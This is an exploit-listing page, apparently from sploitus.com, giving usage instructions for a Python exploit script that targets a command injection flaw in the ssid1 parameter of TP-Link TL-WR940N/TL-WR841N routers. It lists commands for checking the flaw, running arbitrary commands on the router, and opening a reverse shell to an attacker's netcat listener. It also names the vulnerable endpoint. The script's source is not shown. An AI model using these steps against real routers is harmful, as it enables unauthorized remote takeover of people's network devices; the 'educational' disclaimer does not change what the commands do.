## https://sploitus.com/exploit?id=419A1453-F25E-56A6-BEB7-9BF11A527FBF
# Python Exploit for TP-Link TL-WR940N/TL-WR841N Command Injection Vulnerability
## Usage Instructions
1. **Basic Vulnerability Check**:
```
python tplink_exploit.py -t 192.168.1.1 -u admin -p admin
```
2. **Execute Custom Command**:
```
python tplink_exploit.py -t 192.168.1.1 -u admin -p admin -c "your_command_here"
```
3. **Reverse Shell** (set up listener first with `nc -lvnp 4444`):
```
python tplink_exploit.py -t 192.168.1.1 -u admin -p admin --lhost YOUR_IP --lport 4444
```
**Important Notes**:
- These scripts are for educational and testing purposes only
- Always get proper authorization before testing any system
- The reboot command is used as default because it's non-destructive and easily verifiable
- The reverse shell may not work on all firmware versions as it depends on available binaries
- Some firmware versions require a random path in the URL which the script attempts to detect automatically
The vulnerability exists due to improper input sanitization in the `ssid1` parameter of the `/userRpm/WlanNetworkRpm.htm` endpoint, allowing command injection through specially crafted requests.